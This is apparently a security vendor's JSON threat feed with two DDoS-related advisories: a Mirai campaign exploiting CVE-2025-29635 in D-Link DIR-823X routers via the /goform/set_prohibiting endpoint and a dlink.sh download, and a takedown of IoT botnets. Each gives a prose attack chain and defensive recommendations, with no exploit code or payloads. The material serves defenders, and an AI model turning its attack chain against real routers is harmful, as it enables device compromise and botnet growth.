{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/ddos/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2025-29635"},{"cvss":8.8,"id":"CVE-2023-1389"}],"_cs_exploited":false,"_cs_products":["DIR-823X","ZXV10 H108L"],"_cs_severities":["critical"],"_cs_tags":["mirai","ddos","rce","iot"],"_cs_type":"advisory","_cs_vendors":["D-Link","TP-Link","ZTE"],"content_html":"\u003cp\u003eA new Mirai-based malware campaign has been observed exploiting CVE-2025-29635, a high-severity command injection vulnerability affecting D-Link DIR-823X routers. Discovered by Akamai\u0026rsquo;s SIRT in March 2026, the campaign involves attackers sending malicious POST requests to vulnerable D-Link routers to execute arbitrary commands. This vulnerability allows attackers to download and execute a shell script, ultimately leading to the deployment of Mirai-based malware. The affected D-Link routers reached end-of-life in November 2024, meaning a patch is unlikely. The same actor is also exploiting CVE-2023-1389 impacting TP-Link routers, and an RCE flaw in ZTE ZXV10 H108L routers, deploying the same Mirai payload.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker sends a POST request to the \u003ccode\u003e/goform/set_prohibiting\u003c/code\u003e endpoint on the D-Link DIR-823X router.\u003c/li\u003e\n\u003cli\u003eThe POST request exploits CVE-2025-29635 to inject and execute arbitrary commands.\u003c/li\u003e\n\u003cli\u003eThe injected commands change directories across writable paths on the router.\u003c/li\u003e\n\u003cli\u003eA shell script named \u003ccode\u003edlink.sh\u003c/code\u003e is downloaded from an external IP address.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003edlink.sh\u003c/code\u003e script is executed on the compromised router.\u003c/li\u003e\n\u003cli\u003eThe script installs a Mirai-based malware variant named \u0026ldquo;tuxnokill\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003e\u0026ldquo;tuxnokill\u0026rdquo; establishes persistence and begins scanning for new targets.\u003c/li\u003e\n\u003cli\u003eThe compromised device is then used to launch DDoS attacks, leveraging Mirai\u0026rsquo;s standard capabilities, including TCP SYN/ACK/STOMP, UDP floods, and HTTP null attacks.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2025-29635 allows attackers to remotely execute arbitrary commands on vulnerable D-Link DIR-823X routers. The compromised routers are then incorporated into the Mirai botnet, increasing its size and DDoS capabilities. Given that these routers are end-of-life, many remain unpatched, potentially leading to a large number of compromised devices. This can result in network disruptions and service outages for targeted entities, as well as potential data exfiltration.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor network traffic for POST requests to the \u003ccode\u003e/goform/set_prohibiting\u003c/code\u003e endpoint on D-Link routers, as described in the Attack Chain, to detect potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Mirai dlink.sh Download\u003c/code\u003e to identify attempts to download the malicious shell script.\u003c/li\u003e\n\u003cli\u003eIf using affected D-Link DIR-823X routers, TP-Link, or ZTE ZXV10 H108L routers, upgrade to a supported device or implement network segmentation to limit potential damage.\u003c/li\u003e\n\u003cli\u003eBlock the external IP address hosting the \u003ccode\u003edlink.sh\u003c/code\u003e script if it can be reliably determined and is observed on your network.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-23T12:00:00Z","date_published":"2026-04-23T12:00:00Z","id":"/briefs/2026-04-mirai-dlink-rce/","summary":"A new Mirai-based malware campaign is exploiting CVE-2025-29635, a command-injection vulnerability affecting D-Link DIR-823X routers, to enlist devices into the botnet.","title":"Mirai Campaign Exploiting CVE-2025-29635 in D-Link Routers","url":"https://feed.craftedsignal.io/briefs/2026-04-mirai-dlink-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["iot","ddos","botnet","disruption"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eAuthorities have dismantled a globally distributed network of compromised Internet of Things (IoT) devices that were being leveraged to conduct large-scale DDoS attacks. The botnets consisted of a large number of IoT devices. These attacks overwhelmed target systems, rendering them inaccessible. While the specific devices, malware, and attribution remain undisclosed in the provided source, the disruption of these botnets is a significant event for defenders, as it reduces the overall capacity for attackers to launch extremely large DDoS attacks. The botnets were responsible for record-breaking attacks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eCompromise IoT Devices: Attackers exploit vulnerabilities (e.g., default credentials, unpatched firmware) on IoT devices such as routers, cameras, and DVRs.\u003c/li\u003e\n\u003cli\u003eInstall Malware: Malicious software specifically designed for the IoT architecture is installed on the compromised devices.\u003c/li\u003e\n\u003cli\u003eBotnet Formation: The malware turns the IoT devices into bots, which are controlled remotely by a command-and-control (C2) server.\u003c/li\u003e\n\u003cli\u003eC2 Communication: The bots maintain persistent communication with the C2 server, awaiting instructions for launching attacks.\u003c/li\u003e\n\u003cli\u003eDDoS Attack Initiation: The C2 server issues commands to the bots, instructing them to flood a target system with malicious traffic.\u003c/li\u003e\n\u003cli\u003eTraffic Amplification: The bots, now acting in unison, send high volumes of traffic to the target, overwhelming its resources.\u003c/li\u003e\n\u003cli\u003eService Disruption: The target system becomes unavailable to legitimate users due to the sheer volume of malicious traffic.\u003c/li\u003e\n\u003cli\u003eImpact: Disruption of services for targeted organizations, potentially leading to financial losses and reputational damage.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe DDoS attacks launched by these IoT botnets caused significant service disruptions for targeted organizations. The scope of the attacks was described as \u0026ldquo;record-breaking\u0026rdquo;, suggesting a large number of victims and potential financial losses. Sectors affected are not detailed in the source, but DDoS attacks can impact any organization with an online presence. Successful attacks lead to website and application unavailability, impacting business operations and customer access.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor network traffic for unusual spikes in volume and traffic patterns indicative of DDoS attacks.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting and traffic filtering on network infrastructure to mitigate the impact of DDoS attacks.\u003c/li\u003e\n\u003cli\u003eAlthough no specific IOCs are available, investigate any alerts related to high-volume network traffic originating from internal devices.\u003c/li\u003e\n\u003cli\u003eEnable logging on network devices to capture potential indicators of compromise and attack activity.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-20T05:50:09Z","date_published":"2026-03-20T05:50:09Z","id":"/briefs/2024-01-iot-ddos-disruption/","summary":"Law enforcement has disrupted significant IoT botnets responsible for launching record-breaking distributed denial-of-service (DDoS) attacks, impacting the availability of targeted systems.","title":"Disruption of Large IoT DDoS Botnets","url":"https://feed.craftedsignal.io/briefs/2024-01-iot-ddos-disruption/"}],"language":"en","title":"CraftedSignal Threat Feed — Ddos","version":"https://jsonfeed.org/version/1.1"}